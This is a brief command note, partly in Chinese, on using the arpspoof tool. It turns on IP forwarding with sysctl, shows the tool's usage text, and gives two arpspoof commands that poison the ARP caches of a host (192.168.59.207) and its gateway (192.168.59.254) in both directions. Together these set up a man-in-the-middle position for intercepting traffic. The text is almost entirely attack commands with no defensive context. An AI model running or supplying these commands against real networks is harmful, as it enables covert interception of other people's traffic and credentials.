arpspoof

启用 ip_forward

sysctl -w net.ipv4.ip_forward=1
arpspoof  -h
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
arpspoof -i eth0 -t 192.168.59.207 192.168.59.254

arpspoof -i eth0 -t 192.168.59.254 192.168.59.207